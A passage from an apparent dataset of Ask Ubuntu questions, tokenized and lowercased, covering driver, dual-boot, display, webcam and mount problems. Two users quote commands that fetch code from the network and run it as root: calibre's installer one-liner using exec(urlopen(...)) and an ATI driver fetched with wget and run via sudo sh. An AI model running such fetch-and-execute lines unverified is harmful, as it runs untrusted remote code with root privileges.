weighted p-frames : y:0.0 % uv:0.0 % [ libx264 @ 0x165ae80 ] ref p l0 : 96.4 % 3.6 % [ libx264 @ 0x165ae80 ] kb/s:474.19 received signal 2 : terminating . any ideas on how i can resolve this ? the video delay is perfectly acceptable , so i would n't think that it 's a network issue that 's causing the delay in the audio . any help would be appreciated . edit : output from top and iotop .
218600	is it possible to use a ps3 controller to emulate an xbox controller ?	i have my ps3 controller connected through usb and while that works fine , no applications seem to support its keymap . so my question is whether it 's possible to make it emulate an xbox controller similar to what motioninjoy does on windows ? i have done some googling but to no avail . i stumbled upon qtsixa which allows me to assign keys to the controller 's buttons , but i do n't know what key ids the xbox uses .
218606	how to find and control the wlan card with setpci ?	there are some functions/hotkeys on my laptop that do n't work like controlling brightness or turning on/off the wlan card . fortunately for me i know how to control the brightness with setpci ex : setpci -s 00:02.0 f4.b=55 where 55 is the desired brightness level . so the question is , how can i find my wlan card and make it go on/off . this is the dumpregs command output : cap pos w name 00 w vendor_id 02 w device_id 04 w command 06 w status 08 b revision 09 b class_prog 0a w class_device 0c b cache_line_size 0d b latency_timer 0e b header_type 0f b bist 10 l base_address_0 14 l base_address_1 18 l base_address_2 1c l base_address_3 20 l base_address_4 24 l base_address_5 28 l cardbus_cis 2c l subsystem_vendor_id 2e w subsystem_id 30 l rom_address 3c b interrupt_line 3d b interrupt_pin 3e b min_gnt 3f b max_lat 18 b primary_bus 19 b secondary_bus 1a b subordinate_bus 1b b sec_latency_timer 1c b io_base 1d b io_limit 1e w sec_status 20 w memory_base 22 w memory_limit 24 w pref_memory_base 26 w pref_memory_limit 28 l pref_base_upper32 2c l pref_limit_upper32 30 w io_base_upper16 32 w io_limit_upper16 38 l bridge_rom_address 3e w bridge_control 10 l cb_cardbus_base 14 w cb_capabilities 16 w cb_sec_status 18 b cb_bus_number 19 b cb_cardbus_number 1a b cb_subordinate_bus 1b b cb_cardbus_latency 1c l cb_memory_base_0 20 l cb_memory_limit_0 24 l cb_memory_base_1 28 l cb_memory_limit_1 2c w cb_io_base_0 2e w cb_io_base_0_hi 30 w cb_io_limit_0 32 w cb_io_limit_0_hi 34 w cb_io_base_1 36 w cb_io_base_1_hi 38 w cb_io_limit_1 3a w cb_io_limit_1_hi 40 w cb_subsystem_vendor_id 42 w cb_subsystem_id 44 l cb_legacy_mode_base 01 00 - cap_pm 02 00 - cap_agp 03 00 - cap_vpd 04 00 - cap_slotid 05 00 - cap_msi 06 00 - cap_chswp 07 00 - cap_pcix 08 00 - cap_ht 09 00 - cap_vndr 0a 00 - cap_dbg 0b 00 - cap_ccrc 0c 00 - cap_hotplug 0d 00 - cap_ssvid 0e 00 - cap_agp3 0f 00 - cap_secure 10 00 - cap_exp 11 00 - cap_msix 12 00 - cap_sata 13 00 - cap_af 0001 00 - ecap_aer 0002 00 - ecap_vc 0003 00 - ecap_dsn 0004 00 - ecap_pb 0005 00 - ecap_rclink 0006 00 - ecap_rcilink 0007 00 - ecap_rcecoll 0008 00 - ecap_mfvc 000a 00 - ecap_rbcb 000b 00 - ecap_vndr 000d 00 - ecap_acs 000e 00 - ecap_ari 000f 00 - ecap_ats 0010 00 - ecap_sriov
218607	opencpn problem	i 'm not really computer literate . i use a navigation program called opencpn on my sailboat . first it stopped reading the gps . then the tool bar went blank . now it wo n't quit - i have to restart the computer . i 've damaged something else too because the ubuntu download centre will no longer download applications . finally , linux is getting more and more difficult to boot up . how i yearn for my old apple ! ! ! can anyone help ? i 'm well out of my depth ! thanks
218608	installing the third os	i have a laptop which had windows 7 pre-installed . i did dual boot it with ubuntu 12.04 and i have never since booted to windows . what happens now if i install the third os , fedora 17 or opensuse 12.2 by cd ? will the next installed os become the default or will i be able to choose ?
218610	ubuntu 12.10 triple monitors ... so close !	i 'm trying to set up 3 monitors using an ati radeon hd 5450 and an nvidia 9600 gso . i know mixing manufacturers is not desirable , but these were the cards i had laying around . after a few days of tweaking , i finally got all three monitors to at least power on at the same time . i am using the free 'radeon ' and 'nouveau ' drivers . i think i am very close to getting my desktop working , but i just ca n't make it right . preferably , all 3 monitors will each have a launcher and i will be able to move windows between them . i will not be upset if this is not possible , but i just want all 3 on and working . with my current config , my left monitor , powered by the ati card , is running x just fine . the middle and right monitor both have black screens . i can move my mouse to the middle monitor , and move it around the black screen . the right monitor is mirroring everything on the middle monitor . here is my xorg.conf : section `` serverlayout '' identifier `` my x server '' screen `` leftscreen '' 0 0 screen `` centerscreen '' rightof `` leftscreen '' screen `` rightscreen '' rightof `` centerscreen '' endsection section `` serverflags '' option `` xinerama '' `` 1 '' endsection section `` module '' load `` dbe '' load `` extmod '' load `` record '' load `` glx '' load `` dri '' endsection section `` monitor '' identifier `` leftmonitor '' option `` dpms '' endsection section `` monitor '' identifier `` centermonitor '' option `` dpms '' endsection section `` monitor '' identifier `` rightmonitor '' option `` dpms '' endsection section `` device '' identifier `` atil '' driver `` radeon '' # option `` zaphodheads '' `` dvi-0 '' busid `` pci:02:0:0 '' endsection section `` device '' identifier `` nvidiam '' driver `` nouveau '' # option `` zaphodheads '' `` dvi-0 '' busid `` pci:01:0:0 '' endsection section `` device '' identifier `` nvidiar '' driver `` nouveau '' # option `` zaphodheads '' `` dvi-1 '' busid `` pci:01:0:0 '' endsection section `` screen '' identifier `` leftscreen '' device `` atil '' monitor `` leftmonitor '' endsection section `` screen '' identifier `` centerscreen '' device `` nvidiam '' monitor `` centermonitor '' endsection section `` screen '' identifier `` rightscreen '' device `` nvidiar '' monitor `` rightmonitor '' endsection has anyone been able to accomplish 3 monitors with nvidia and ati together ?
218613	gmail web app does n't show the number of unread emails	i install gmail web app . a gmail icon appears in the unity bar , but it does n't show unread emails . what should i do to show number of unread emails ?
218616	type with screen turned off	i often write without needing to see what i 'm actually typing . is there a way to toggle the screen off and on ( with a keyboard shortcut , or by configuring the lowest brightness setting to turn the screen completely off ) so that i am able to continue working with the screen off ?
218617	what app to download torrents or how to start mtorrent	i have downloaded mtorrent for linux 64bit but i do n't know what to run to install it . how do i run it or is there any other way to download torrents ?
218622	is deja dup compatible with dropbox ?	if it is , how do i do it ? i 'm using deja dup 14.2 on lucid .
218625	apt-get install wo n't work	first of all : i am quite new to ubuntu ( and linux and servers in all ) . when i am trying to install ex phpmyadmin from apt-get , i get the error : e : could n't configure pre-depend upstart-job for hostname , probably a dependency cycle . can anyone tell me why this happens , and what i can do to fix it ? i am running ubuntu server 7.10 . /christoffer -- -edit -- - i found the problem - and the solution ! i had `` ruined '' ( changed a little ) my sources.list -and when i `` reinserted '' a new one , it all worked ! yuhu ! but thanks for your time , rupali !
218629	driver for nvidia graphics card on 12.10	i have installed ubuntu 12.10 64bit and the default driver for my nvidia gtx670 is an open source xorgx . i intend to play games on wine . what driver should i use ?
218630	aliases - able to pass arguments ?	i want to make an alias in my .bashrc or .bashrc_aliases file ( probably the latter ) . specifically , i want to call the clang command for my *.c file i 'm writing . what i 'm looking for is best summed up if i provide an example : i have program1.c written i want to be able to type ( in the terminal ) `` compile program1 '' , and something like the following should be actually run : clang -ggdb -std=c99 -wall -werror program1.c -lcrypt -lcs50 -lm -o program1 for those who have taken harvard 's cs50 class , you will recognize this as their `` make '' command . so if the above is impossible , and you know another way to make this happen , i 'm all ears . i 'm trying to avoid using their vm , as my netbook is n't really up to par to handle a vm .
218632	how will qt 5.0 be packaged for raring ?	note : as per the faq , `` issues with the next version of ubuntu '' may not be asked as questions here but in my opinion , this is not an issue but merely a question asking about policy . if you feel this question is off-topic , please leave a comment explaining why or open a question on meta.au . how will qt 5.0 be packaged for ubuntu when it is released ? currently , the name of the package for installing the qt 4.8 core libraries is : libqt4-core will the equivalent package for the next version of qt ( 5.0 ) be named libqt5-core ? if not , what will the package be named ? will the existing qt 4.8 libraries coexist with the qt 5.0 equivalents for the foreseeable future or will they be removed ? the qt 5.0 beta 2 ppa contains a lot of packages - few of which seem to correspond with existing package names . if someone can provide me with a link to a policy outlining the qt 5.0 migration plan , that would be awesome .
218638	how can i unmount a s3fs mount as a normal user ?	i use s3 a ton . i have over 40 or so buckets floating around between clients . i like the fact that i can list them in /etc/fstab and that they just work . for reference here is one of the buckets . coteyrnet /mnt/s3/coteyrnet fuse.s3fs _netdev , use_cache=/tmp , use_rrs=1 , allow_other , noauto , users 0 0 it mounts fine , but i am having one heck of a time unmounting it . the first problem is : umount : /mnt/s3/coteyrnet mount disagrees with the fstab the relevant part of mtab is : s3fs /mnt/s3/coteyrnet fuse.s3fs rw , noexec , nosuid , nodev , allow_other , user=coteyr 0 0 when running mount with no arguments it reports the mount as : s3fs on /mnt/s3/coteyrnet type fuse.s3fs ( rw , noexec , nosuid , nodev , allow_other , user=coteyr ) in addition to that , if i sudo umount /mnt/s3/coteyrnet i always get umount : /mnt/s3/coteyrnet : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) lsof | grep coteyrnet never returns anything of value , nor does fuser . my goal is to get user unmounting working . the inability to mount via sudo has been resolved . by using the `` use_cache '' setting the files were actually open , but not under the mount point . this is a caveat to that option . the mount point files are closed but the files were not yet transferred to s3 . by waiting `` a while '' and trying again , sudo can unmount .
218641	how can i connect to internet wi-fi	i just installed libuntu on my pc . i guess it must be great , but i simply can not connect it to the internet . i select my network , input the password , et voilă , nothing happens . it keeps asking for the password . my connection is from vodafone in germany , i have a vodafone modem at home . i am no geek or techie , so need to be very clear . thank you ! marco
218642	ubuntu dual screen using virtual machine - amd gpu	i 've been searching online and reading tutorials and etc about how to make my ubuntu vm dual screen ( x86_64 ) . i have first tried to run these commands : sudo aticonfig -- initial -f which gave me the ouput of : sudo : aitconfig : command not found i then googled the output and followed these instructions that i tells me to install my ati drivers onto my ubuntu . wget http : //www2.ati.com/drivers/linux/ati-driver-installer-11-5-x86.x86_64.run sudo sh ati-driver-installer-11-5-x86.x86_64.run -- buildpkg ubuntu/natty sudo dpkg -i *.deb sudo apt-get -f install sudo aticonfig -f -- initial -- adapter=all sudo reboot it all works well until i input sudo apt-get -f install which gives me the following output : sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 25 not upgraded . 3 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up fglrx ( 2:8.850-0ubuntu1 ) ... update-alternatives : error : alternative link /usr/bin/aticonfig is already managed by x86_64-linux-gnu_gl_conf . dpkg : error processing fglrx ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of fglrx-amdcccle : fglrx-amdcccle depends on fglrx ; however : package fglrx is not configured yet . dpkg : error processing fglrx-amdcccle ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of fglrx-dev : fglrx-dev depends on fglrx ; however : package fglrx is not configured yet . dpkg : error processing fglrx-dev ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : fglrx fglrx-amdcccle fglrx-dev e : sub-process /usr/bin/dpkg returned an error code ( 1 ) at this point , i do n't know what to do since running : gksudo amdcccle for the record , i have 3d acceleration turned on . the following is my gpu for my vm lspci | grep vga 00:02.0 vga compatible controller : innotek systemberatung gmbh virtualbox graphics adapter any help on how i can make my vm dual screen with ubuntu would be great . thank you in advance .
218643	after login i only get a terminal window	first of , let me tell you i 'm a n00b at ubuntu . i have updated my ubuntu mediacenter to a later version of ubuntu , currently at 12.04 . i 'm working through a lot of updates to get to the latest . but since my first update i got the new login screen ( lightdm ? ) and my autologin wase n't working anymore . so i googled how i could make lightdm autologin . i 've managed this by making my /etc/lightdm/lightdm.conf look as follows : [ seatdefaults ] greeter-session=unity-greeter user-session=ubuntu autologin-user=my_user autologin-userutologin-user=-timeout=0 which seemed to work ... but now that it automatically logs in , i seem to get the following type of screen ( through nomachine remote desktop client ) : sorry ... i am unable to post my screenshot here because i do not have the 10 reputation points in askubuntu yet ... . darn it ... but the screen has a terminal at the top left of the screen ( not an actual `` window '' ) , and the ubuntu loading screen is still behind it . i 've tried running startx as you can see . but , this seems to actually be x server . but if i run unity -- reset , it seems that a lot of the desktop gets restored , but ... with a lot of errors and warnings and the next time i boot , it 's the same story all over again . also , when i close the terminal window after getting my desktop back , i get thrown back at the login screen . please bear with my lack of knowledge of ubuntu and it 's underlying unix . i thank you in advance . edit : i 've just tried disabling the autologin and check if logging in with another user would make a difference . first , i get the login screen as expected . then i login as a different user then the autologin user ( btw , if i try the autologin user from the login screen i get the same result as autologin ) . then the screen only shows the background , nothing else , when trying right mouse click , i get the option menu to change background etc ... which i also can open . nothing more , so no terminal at this user , but nothing else either . edit 2 : i 've managed to get the other user working again , by going to terminal ( ctrl + alt + t ) executing ccsm . there i only had to check `` ubuntu unity plugin '' . when i did that , the desktop appeared . so i do have a working user now ( even after rebooting ) . but still , the other user still seems screwed . i tried the above there as well , i needed to enable a lot more of options there . ( as mentioned on : http : //www.tuxgarage.com/2011/04/missing-top-and-side-panels-in-unity.html ) but still , no progress on this user ...
218645	juju instances in agent-state : down after turning them off ( and back on ) on ec2	i turned my juju instances off on ec2 for a while and after bringing them back online they seem to be in an odd state : juju status 2012-11-17 17:06:44,094 info connecting to environment ... 2012-11-17 17:06:45,590 info connected to environment . machines : 0 : agent-state : not-started dns-name : ec2-54-242-142-196.compute-1.amazonaws.com instance-id : i-b0996fcf instance-state : running 1 : agent-state : down dns-name : ec2-50-19-186-245.compute-1.amazonaws.com instance-id : i-8c8375f3 instance-state : running 2 : agent-state : down dns-name : ec2-54-242-255-238.compute-1.amazonaws.com instance-id : i-56807629 instance-state : running services : wordpress : charm : cs : precise/wordpress-9 exposed : true relations : db : - wordpress-db loadbalancer : - wordpress units : wordpress/0 : agent-state : down machine : 2 open-ports : - 80/tcp public-address : ec2-54-242-227-57.compute-1.amazonaws.com wordpress-db : charm : cs : precise/mysql-10 relations : db : - wordpress units : wordpress-db/0 : agent-state : down machine : 1 public-address : ec2-54-242-212-177.compute-1.amazonaws.com can i not take my instances down for a while ? or is this something else ?
218647	how do i get my apple mighty mouse to work on ppc edition ?	i had some trouble pairing the device but i finally got it to pair . so far , only the mouse cursor and the scroll wheel work . when i try to click , it does n't work . i 'm using ubuntu 12.04 powerpc edition and a powerbook g4 . the mouse is a mighty mouse , not a magic mouse .
218651	gnome shell problems when upgrading from 12.04 to 12.10	the upgrade went mainly smooth but i 've had some problems with the indicators in the bottom right corner . they have become so big , compared to what they 've been looking like in 12.04 , and when i click them so i can access the menu , the panel disappears and then later the menu comes up . it works , but it 's a weird behavior ... so how do i fix this ?
218658	windows 7 with ubuntu problems hp	i have a hp e9300z , have windows 7 on it currently . x64 bit . i wish to dual boot ubuntu with windows 7 , when i do the windows setup , do not even get the options to install alongside with , just install or something else . someone in another forum said something with the hp bios , can not find where to change anything . so what do i have to do so ubuntu sees my hdd with windows ? manually make partition ? only have 1 partition my c : windows . thanks .
218661	custom session in lightdm `` chrome os ''	am do this sudo gedit /usr/share/xsessions/chromeos.desktop and i file : [ desktop entry ] encoding=utf-8 name=chrome os comment= exec=google-chrome -- standalone type=application in this way am have custom session in lightdm `` chrome os '' my keyboard input is qwertz but in this session , and in lightdm is qwerty how to change that ? and how to expend this session . same thing am trying with play-on-linux becouse am have eee pc with 1.3ghz and 1gb ram
218664	how to preseed 12.10 desktop when the ubuntu-desktop package is missing ?	i have been trying to use a preseed file to do pxe booting of a 12.10 desktop . upon the first boot , i was greeted by a terminal with login prompt . surprised , i checked the /var/log/installer/syslog but did n't find a trace of desktop installation . feeling curious , i double-checked the content of the loop mounted iso file , and realized that the ubuntu-desktop package that existed up to 12.04.1 is no longer available . so , the following preseed lines from the ubuntu preseed example no longer apply : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # package selection # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # selected packages . tasksel tasksel/first multiselect ubuntu-desktop # tasksel tasksel/first multiselect lamp-server , print-server # tasksel tasksel/first multiselect kubuntu-desktop given such a situation , is there something that i can specify in the pre-seed file to install the entire default desktop ?
218666	windows 8 and ubuntu 12.10 dual boot	i have been having a tough time getting a new computer ( lenovo h430 ) that came with windows 8 to dual boot with ubuntu linux . i can get ubuntu to install from a usb drive and can use the live system ( ubuntu 12.10 ) but dual booting has not worked . i have cruised the internet and tried a number of solutions such as easybcd 2.2 and boot repair under linux . i have also gone into the setup screen to try and fix it but the lenovo acromyms in the setup are not illuminating for me . does anyone know of a clear set of instructions for installing ubuntu on a machine delivered with windows 8 ?
218669	ubuntu is responding to mouse clicks , but not movement	yesterday , i started having a problem in my 12.04 installation where my cursor was huge . i tried changing the cursor theme in dconf-editor , but that did n't fix it after a reboot , so i decided to just deal with it for now . later on , i rebooted the machine again and since then , the cursor has not been appearing on the screen at all , though it does appear to be at the bottom right corner edge , invisible ( right clicking brings up a menu there ) . all mouse buttons work on both my laptop 's trackpad and an external mouse , just not actually moving either . i recently installed the nvidia graphics drivers and the compiz settings manager . could one of those have caused this ? any help would be much appreciated !
218671	vmware workstation 9 - share vms on different disk location	so i 've done some search and i was n't able to find was i was looking for . what 's i 'm trying to do is to share multiple virtual machines on different disk location with vmware workstation 9 . setup is simple : i have two physical hosts running virtual machines both hosts runs under ubuntu 12.10 x64 . i want to have access to my virtual machines wherever the location of the virtual machines on the physical disk . i want to use the embedded sharing feature of vmware workstation originally , i was accessing my virtual machines with xrdp . since i 've updated both physical hosts with ubuntu 12.10 , there 's a known bug in which prevents me to connect remotely . on the second part , while looking for my solution on the internet , i found this , but it 's only a solution for windows physical hosts . thanks you very much for your time ! dave
218672	'x error of failed request : badrequest ( invalid request code or no such operation ) ' after installing the amd binary driver on 12.10	i have just installed the binary driver for amd hardware on ubuntu 12.10 using the `` installing upstream drivers directly from amd 's website '' method . but now when i run 'fglrxinfo ' , i get this message : x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 153 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 12 current serial number in output stream : 12 how can i get the driver working properly ?
218675	how to use czech macintosh keyboard ?	i just installed ubuntu on my mac . however , i found out there is no `` czech ( macintosh ) '' keyboard , despite there being `` dutch ( macintosh ) '' , `` german ( macintosh ) '' and so on . since i am a programmer , i want to have all the special letters like ` on the same place they are actually on the keyboard ( since i am so used to them ) . is there a possibility to install czech macintosh keyboard ?
218678	calibre default installation location	i want to upgrade my calibre , an ebook management . from it 's site all i need just do the following : sudo python -c `` import sys ; py3 = sys.version_info [ 0 ] > 2 ; u = __import__ ( 'urllib.request ' if py3 else 'urllib ' , fromlist=1 ) ; exec ( u.urlopen ( 'http : //status.calibre-ebook.com/linux_installer ' ) .read ( ) ) ; main ( ) '' however , once i executed it 's asking me : enter the installation directory for calibre [ /opt ] : does anyone know the default installation location of calibre installed by usc ?
218680	after a while integrated webcam is disconnected	when i boot my ubuntu 12.04 i can see the output of my webcam through cheese , skype , etc ... but then it freeze and in the dmesg it shows that is disconnected and it disappears from lsusb . also the /dev/video* disappears . it was working before , but for some reason now i have this problem . i think it was an update ... let me know if you need more information . thanks in advance . here are some outputs . dmesg : ~ $ dmesg | grep video [ 1.246713 ] pci 0000:00:02.0 : boot video device [ 31.964037 ] linux video capture interface : v2.00 [ 31.964925 ] uvcvideo : found uvc 1.00 device hp webcam-50 ( 05c8:0222 ) [ 31.972137 ] usbcore : registered new interface driver uvcvideo ~ $ dmesg | grep webcam [ 31.964925 ] uvcvideo : found uvc 1.00 device hp webcam-50 ( 05c8:0222 ) [ 31.971458 ] input : hp webcam-50 as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.5/2-1.5:1.0/input/input6 dmesg line that appears when the problem occurs : nov 17 18:46:39 xxxx kernel : [ 146.380681 ] usb 2-1.5 : usb disconnect , device number 3 line that disappear after the problem in lsusb : bus 002 device 003 : id 05c8:0222 cheng uei precision industry co. , ltd ( foxlink ) luvcview output : ~ $ luvcview luvcview 0.2.6 sdl information : video driver : x11 a window manager is available device information : device path : /dev/video0 error opening v4l interface : no such file or directory no video0 file . ~ $ ls -lha /dev/video* ls : can not access /dev/video* : no such file or directory ~ $ ls /dev/video* ls : can not access /dev/video* : no such file or directory ker.log output : ~ $ more /var/log/kern.log | grep video nov 17 08:06:25 bones-lp kernel : [ 49207.763326 ] pm : resume of drv : uvcvideo dev:2-1.5:1.0 complete after 446.656 msecs nov 17 08:06:25 bones-lp kernel : [ 49207.763329 ] pm : resume of drv : uvcvideo dev:2-1.5:1.1 complete after 446.620 msecs nov 17 08:06:25 bones-lp kernel : [ 49208.704020 ] video lnxvideo:00 : restoring backlight state nov 17 13:59:19 bones-lp kernel : [ 65285.984306 ] pm : resume of drv : uvcvideo dev:2-1.5:1.1 complete after 177.736 msecs nov 17 13:59:19 bones-lp kernel : [ 65285.984334 ] pm : resume of drv : uvcvideo dev:2-1.5:1.0 complete after 177.808 msecs nov 17 13:59:19 bones-lp kernel : [ 65287.193393 ] video lnxvideo:00 : restoring backlight state nov 17 15:49:43 bones-lp kernel : [ 1.242691 ] pci 0000:00:02.0 : boot video device nov 17 15:49:43 bones-lp kernel : [ 34.506239 ] linux video capture interface : v2.00 nov 17 15:49:43 bones-lp kernel : [ 34.506715 ] uvcvideo : found uvc 1.00 device hp webcam-50 ( 05c8:0222 ) nov 17 15:49:43 bones-lp kernel : [ 34.514181 ] usbcore : registered new interface driver uvcvideo nov 17 16:57:35 bones-lp kernel : [ 4104.806501 ] usbcore : deregistering interface driver uvcvideo nov 17 16:57:35 bones-lp kernel : [ 4104.907525 ] linux video capture interface : v2.00 nov 17 16:57:35 bones-lp kernel : [ 4104.916846 ] usbcore : registered new interface driver uvcvideo nov 17 17:00:30 bones-lp kernel : [ 4279.157010 ] usbcore : deregistering interface driver uvcvideo nov 17 17:06:18 bones-lp kernel : [ 4627.158181 ] linux video capture interface : v2.00 nov 17 17:06:39 bones-lp kernel : [ 4647.411770 ] usbcore : registered new interface driver uvcvideo nov 17 17:26:49 bones-lp kernel : [ 5855.992986 ] usbcore : deregistering interface driver uvcvideo nov 17 17:27:14 bones-lp kernel : [ 5880.845078 ] usbcore : registered new interface driver uvcvideo nov 17 18:44:48 bones-lp kernel : [ 1.246713 ] pci 0000:00:02.0 : boot video device nov 17 18:44:48 bones-lp kernel : [ 31.964037 ] linux video capture interface : v2.00 nov 17 18:44:48 bones-lp kernel : [ 31.964925 ] uvcvideo : found uvc 1.00 device hp webcam-50 ( 05c8:0222 ) nov 17 18:44:48 bones-lp kernel : [ 31.972137 ] usbcore : registered new interface driver uvcvideo
218685	favorite desktop environment to use with nomachine nx server ?	what 's everyone 's favorite desktop environment to use with nx ? it 's a known bug that unity wo n't work with ubuntu 12.10 and there 's no more ubuntu-2d . gnome-classic and gnome-session-fallback crash the x server on my macbook . i 've installed xubuntu/xfce4 and that 's the only one i can consistently log in to , though i 'm running into the issue with libcairo2 needing a downgrade which i 'd rather not do . i also suspect that any desktop environment i could get to work would have the libcairo2 issue .
218691	a problem with youtube-dl	i am trying to use the youtube video downloader youtube-dl but when trying to use for downloading videos i get traceback ( most recent call last ) : file `` /usr/bin/youtube-dl '' , line 29 , in < module > import gzip file `` /usr/local/lib/python2.5/gzip.py '' , line 9 , in < module > import zlib importerror : no module named zlib any help ? ? ? ?
218694	update manager problems	i 'm running lucid and whenever i open update manager , it says i should run a partial upgrade . i think this may have happened when i was trying to update and my computer shut off . so i click partial upgrade and while it 's calculating the changes , it gives me an error . it says : could not calculate upgrade an unresolvable problem occurred while calculating the upgrade . the package update-manager-kde is marked for removal but it is in the removal blacklist . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu this is most likely a transient problem , please try again later . this is extremely frustrating , and every time i try to upgrade , this happens . i might just try sudo apt-get install -f to fix it , but that 's all i can think of to fix this problem . edit : sudo apt-get install -f did not work .
218695	ubuntu 12.10 , shows that wireless connection is established but ca n't browse the internet .	i am really new to linux and i just installed ubuntu 12.10 on my computer . when i try to connect to my wifi , i get a notification saying `` wireless connection established '' . but when i open mozilla firefox , i ca n't browse the internet at all . it works just fine with a wired connection . please please help me out ) :
218696	trying to get back seamless mode on my virtualbox	i am trying from some days to activate again the seamless mode on my virtualbox ( using ubuntu 12.04 on an osx device ) , which was correctly set till now but which is n't working anymore . i have had already this problem but then i had to reinstall a new disk on my vb . i tried everything i know : installing it by clicking on the 'devices ' item in the nav bar of vb 's app , i created a new dir in /media and then tried to mount the /dev/sr0 . when running sh ./vboxlinuxadditions.run , it installed correctly but when rebooting my machine , i always have the same problem . does anybody knows how to activate again seamless mode ?
218697	coul n't hibernate	i could n't hibernate my system due to insufficient swap memory . hence , i created a swap partition with the size twice of my ram . however , when i tried to activate the partition and open fstab file , the file 's content is as follows : proc /proc proc nodev , noexec , nosuid 0 0 /host/ubuntu/disks/root.disk / ext4 loop , errors=remount-ro , user_xattr 0 1 /host/ubuntu/disks/swap.disk none swap loop , sw 0 0 what does it means ? is it an error ? how can i specify my uuid ? thank you
218699	how to set up gnash and epiphany for youtube ?	i like the browser epiphany ( now web or something ) . i also hate flash and i heard about gnash , its free alternative . all i want to do is to set up epiphany somehow to use gnash on youtube . i ca n't get that to work . i have installed browser-plugin-gnash , but it does n't do anything . i have plug-ins enabled in epiphany . all it does is just display black box instead of video ( just as if no plugin was installed ) .
218702	can not mount one usb disc , although other mounts automatically after 12.10 upgrade	since upgrading to 12.10 , switching on or attempting to mount one of my usb hard drives gives this error message : error mounting system-managed device /dev/sdg1 : command-line `mount '' /mnt/usb-st350041_8as_60caffffffff-0:0-part1 '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sdg1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so dmesg | tail gives ( inter alia ) : [ 1080.727830 ] sdg : sdg1 [ 1080.732003 ] sd 8:0:0:0 : [ sdg ] attached scsi disk [ 1081.383633 ] fat-fs ( sdg1 ) : unrecognized mount option `` x-gvfs-show '' or missing value [ 1871.160973 ] sdg : sdg1 the drive can not be mounted , but is recognized by the system as a `` place '' . i am not a technical bod ; i can not take this further myself and any help would be much appreciated .
218704	cant dual boot windows7 uefi 64bits and ubuntu 12.04 64 bits in a two hard drive computer	i have a new lap top , an asus n76v that has two 500gb hard drive . windows7 is installed in the first hd in uefi . i have tried to install ubuntu 12.04 64bits in the second hard drive . i have used the ubuntu live cd and the first strange thing is that ubuntu can not recognize the partitions of the first hd where windows 7 is installed . so i do n't get the option to install together with wind7 . i make the manual generation of the partitions for ubuntu in hard drive 2 and install ubuntu ( not uefi ) . everything goes well and i can successfully boot ubuntu . but when i try to boot windows7 the windows boot manager it gives me the following error ( windows failed to start ... .. etc etc ... . file : \boot\bcd status:0xc000000e ) the thing is that i do n't think windows has corrupted files because if i erase ubuntu win7 is able to boot just fine . i also have tried to install ubuntu with wubi , but although windows is able to boot perfectly , windows boot manager gives an error quite similar to the one obtained for windows7 in the live cd installation . in summary , i can not dual boot the 2 os . here is some info obtained by boot info script : boot info script 0.60 from 17 may 2011 ============================= boot info summary : =============================== = > no boot loader is installed in the mbr of /dev/sda . = > grub2 ( v1.99 ) is installed in the mbr of /dev/sdb and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for on this drive . sda1 : __________________________________________________________________________ file system : vfat boot sector type : unknown boot sector info : no errors found in the boot parameter block . operating system : boot files : sda2 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' sda3 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /bootmgr /boot/bcd /windows/system32/winload.exe sda4 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : boot files : sda5 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sdb1 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : /grub/grub.cfg /grub/core.img sdb2 : __________________________________________________________________________ file system : extended partition boot sector type : unknown boot sector info : sdb5 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 12.04.1 lts boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sdb6 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : sdb7 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 500.1 gb , 500107862016 bytes 256 heads , 63 sectors/track , 60563 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sda1 1 4,294,967,295 4,294,967,295 ee gpt /dev/sda1 ends after the last sector of /dev/sda guid partition table detected . partition start sector end sector # of sectors system /dev/sda1 2,048 411,647 409,600 efi system partition /dev/sda2 411,648 673,791 262,144 microsoft reserved partition ( windows ) /dev/sda3 673,792 391,383,039 390,709,248 data partition ( windows/linux ) /dev/sda4 391,383,040 925,575,167 534,192,128 data partition ( windows/linux ) /dev/sda5 925,575,168 976,773,167 51,198,000 windows recovery environment ( windows ) drive : sdb _____________________________________________________________________ disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition 